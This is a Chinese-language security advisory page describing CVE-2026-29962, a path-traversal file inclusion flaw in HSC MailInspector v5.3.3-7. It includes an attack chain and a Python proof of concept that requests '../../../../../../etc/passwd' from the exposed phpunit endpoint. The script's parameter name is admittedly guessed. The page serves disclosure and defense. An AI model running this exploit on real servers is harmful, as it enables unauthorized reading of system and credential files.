IPBUF安全漏洞报告
English
CVE-2026-29962 CVSS 7.5 高危

HSC MailInspector v5.3.3-7 本地文件包含漏洞 (LFI)

披露日期: 2026-05-18

漏洞信息

漏洞编号
CVE-2026-29962
漏洞类型
本地文件包含 (LFI)
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
HSC MailInspector

相关标签

本地文件包含路径遍历LFIHSC MailInspector信息泄露

漏洞概述

HSC MailInspector v5.3.3-7版本被发现存在严重的本地文件包含(LFI)漏洞。该漏洞源于应用程序未能正确控制用户提供的文件路径,受影响的端点为/vendor/phpunit/phpunit.php。由于系统在处理用户可控参数时未进行有效的验证、清理或路径限制,远程攻击者可利用路径遍历技术读取底层操作系统及应用程序目录中的任意文件,进而导致敏感信息泄露。

技术细节

该漏洞的技术成因在于HSC MailInspector v5.3.3-7版本在处理文件包含请求时,未实施严格的输入验证和路径过滤。受影响的组件位于/vendor/phpunit/phpunit.php,该端点直接将用户可控的输入参数传递给后端的文件读取函数,且未对路径中可能包含的遍历字符(如“../”)进行转义或拦截。这种设计缺陷使得攻击者能够通过构造特殊的HTTP请求,绕过目录限制,访问Web根目录之外的文件系统资源。由于该漏洞无需用户交互和身份认证,攻击者可轻易获取服务器上的敏感配置信息、源代码文件或系统凭证,从而造成严重的信息安全风险。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是HSC MailInspector v5.3.3-7,并发现暴露的/vendor/phpunit/phpunit.php端点。
STEP 2
漏洞利用
攻击者向目标端点发送特制的HTTP GET请求,在参数中插入路径遍历序列(如'../'),试图读取/etc/passwd文件。
STEP 3
数据泄露
服务器端未对路径进行过滤,直接读取并返回了文件内容,攻击者成功获取敏感系统信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import requests def exploit_lfi(target_url): """ PoC for CVE-2026-29962 - LFI in HSC MailInspector """ # The vulnerable endpoint mentioned in the description endpoint = "/vendor/phpunit/phpunit.php" # Attempting to read /etc/passwd using path traversal # Note: The actual parameter name might vary, assuming 'file' based on common LFI patterns payload = {"file": "../../../../../../etc/passwd"} try: response = requests.get(target_url + endpoint, params=payload, timeout=10) # Check if the response contains typical /etc/passwd content if response.status_code == 200 and "root:x" in response.text: print("[+] Vulnerability Exploited Successfully!") print("[+] Leaked Content (first 200 chars):") print(response.text[:200]) return True else: print("[-] Exploit failed or target not vulnerable.") return False except Exception as e: print(f"[!] Error occurred: {e}") return False if __name__ == "__main__": target = "http://127.0.0.1" # Replace with actual target exploit_lfi(target)

影响范围

HSC MailInspector v5.3.3-7

防御指南

临时缓解措施
如果不能立即升级,建议在防火墙或Web服务器配置中阻断对路径/vendor/phpunit/phpunit.php的访问请求,以防止漏洞被利用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表